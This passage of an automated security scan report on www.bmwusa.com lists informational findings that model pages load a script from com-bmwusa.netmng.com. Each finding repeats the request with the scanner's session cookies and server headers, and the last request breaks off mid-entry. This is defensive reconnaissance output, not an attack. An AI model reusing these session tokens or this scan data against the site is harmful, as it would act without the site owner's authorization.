Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:30 GMT;path=/
Content-Length: 215521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.185. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:28 GMT;path=/
Content-Length: 202243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.186. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:48 GMT;path=/
Content-Length: 212632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.187. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:54 GMT;path=/
Content-Length: 212633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.188. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:26 GMT;path=/
Content-Length: 228916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.189. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:36:56 GMT;path=/
Content-Length: 228917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.190. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:41 GMT;path=/
Content-Length: 217827


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.191. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:21 GMT;path=/
Content-Length: 217828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.192. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:04 GMT;path=/
Content-Length: 202313


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.193. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:20 GMT;path=/
Content-Length: 212884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.194. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:18 GMT;path=/
Content-Length: 228584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.195. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:15 GMT;path=/
Content-Length: 215840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.196. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:21 GMT;path=/
Content-Length: 202223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.197. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:04 GMT;path=/
Content-Length: 212740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.198. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
